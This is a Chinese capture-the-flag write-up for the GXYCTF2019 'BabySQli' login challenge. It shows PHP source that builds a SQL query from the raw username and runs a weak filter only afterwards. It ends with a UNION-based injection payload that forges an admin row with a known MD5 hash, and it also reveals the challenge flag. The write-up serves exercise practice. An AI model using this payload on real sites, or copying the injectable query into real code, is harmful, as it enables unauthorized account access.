代码 [GXYCTF2019]BabySQli
- config.php
<?php
DEFINE('DB_USER','123');
DEFINE('DB_PASSWORD','123');
DEFINE('db_host','127.0.0.1');
DEFINE('DB_NAME','web_sqli');
$con=@mysqli_connect(db_host,DB_USER,DB_PASSWORD,DB_NAME) OR die ('couldnt connect'.mysqli_connect_error());
?>
- flag.php
<?php $flag = 'GXY{y0u_4re_not_aDmin!}';?>
- index.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<center>
<form action="search.php" method="post" style="margin-top: 300">
<input type="text" name="name" placeholder="UserName" required>
<br>
<input type="password" style="margin-top: 20" name="pw" placeholder="password" required>
<br>
<button style="margin-top:20;" type="submit">登录</button>
</form>
</center>
- search.php
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";
// 去除转义
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);
if(preg_match("/(|)|=|or/", $name)){
die("do not hack me!");
}
else{
if (!$result) {
printf("Error: %s
", mysqli_error($con));
exit();
}
else{
// echo '<pre>';
$arr = mysqli_fetch_row($result);
// print_r($arr);
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
}
}
?>
关键代码在search.php
$sql = select * from user where username = '$name';
$result = mysqli_query($con, $sql);
正常的逻辑应该为:
<?php
$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";
// 创建连接
$conn = mysqli_connect($servername, $username, $password, $dbname);
// Check connection
if (!$conn) {
die("连接失败: " . mysqli_connect_error());
}
$sql = "SELECT id, firstname, lastname FROM MyGuests";
$result = mysqli_query($conn, $sql);
if (mysqli_num_rows($result) > 0) {
// 输出数据
while($row = mysqli_fetch_assoc($result)) {
echo "id: " . $row["id"]. " - Name: " . $row["firstname"]. " " . $row["lastname"]. "<br>";
}
} else {
echo "0 结果";
}
mysqli_close($conn);
?>
mysql Union查询特性
在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。
所以,如果username输入
1' union select 1,'admin','900150983cd24fb0d6963f7d28e17f72'#
password输入abc,就可以登录成功